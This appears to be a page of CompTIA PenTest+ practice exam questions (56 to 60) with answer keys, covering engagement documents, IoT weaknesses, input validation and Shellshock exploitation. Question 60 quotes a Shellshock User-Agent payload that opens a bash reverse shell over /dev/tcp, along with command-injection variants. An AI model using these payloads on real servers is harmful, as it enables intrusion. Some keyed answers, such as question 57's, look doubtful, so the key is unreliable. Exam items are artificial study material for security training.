Practice Exams:

Free PT0-002 Exam Braindumps

Pass your CompTIA PenTest+ Certification Exam exam with these free Questions and Answers

Page 13 of 56
PDF with 278 Questions
QUESTION 56

Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

  1. A. MSA
  2. B. NDA
  3. C. SOW
  4. D. ROE

Correct Answer: B

QUESTION 57

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

  1. A. Unsupported operating systems
  2. B. Susceptibility to DDoS attacks
  3. C. Inability to network
  4. D. The existence of default passwords

Correct Answer: A

QUESTION 58

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

  1. A. Comma
  2. B. Double dash
  3. C. Single quote
  4. D. Semicolon

Correct Answer: C

QUESTION 59

Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

  1. A. The team exploits a critical server within the organization.
  2. B. The team exfiltrates PII or credit card data from the organization.
  3. C. The team loses access to the network remotely.
  4. D. The team discovers another actor on a system on the network.

Correct Answer: D

QUESTION 60

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  1. A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  2. B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  3. C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  4. D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Correct Answer: A

Page 13 of 56
PDF with 278 Questions

Post your Comments and Discuss CompTIA PT0-002 exam with other Community members: